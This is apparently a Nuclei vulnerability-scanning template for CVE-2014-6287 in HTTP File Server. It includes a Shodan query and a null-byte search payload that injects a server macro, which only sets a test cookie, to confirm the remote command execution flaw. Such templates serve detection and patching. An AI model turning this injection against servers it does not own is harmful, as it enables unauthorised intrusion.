HFS /

id: 'CVE-2014-6287' info: name: HTTP File Server <2.3c - Remote Command Execution author: j4vaovo severity: critical description: | HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. remediation: | Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287 - http://www.kb.cert.org/vuls/id/251276 - http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html - https://github.com/rapid7/metasploit-framework/pull/3793 - https://nvd.nist.gov/vuln/detail/CVE-2014-6287 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: 'CVE-2014-6287' cwe-id: CWE-94 epss-score: 0.97289 epss-percentile: 0.99817 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: rejetto product: http_file_server shodan-query: http.favicon.hash:2124459909 tags: packetstorm,msf,cve,cve2014,hfs,rce,kev variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' http: - method: GET path: - '{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}' matchers-condition: and matchers: - type: word part: body words: - 'HFS /' - type: word part: header words: - 'Set-Cookie: {{str1}}={{str2}};' - 'text/html' condition: and - type: status status: - 200 # digest: 490a0046304402200747d85c4f1aeed831beb27c74b38300bd419e3bb25b403b91593a026deb3d530220208578a2a0c6b069ed716cef539e8f17eaba2db1c42dcda110bd03a95009a810:922c64590222798bb761d5b6d8e72950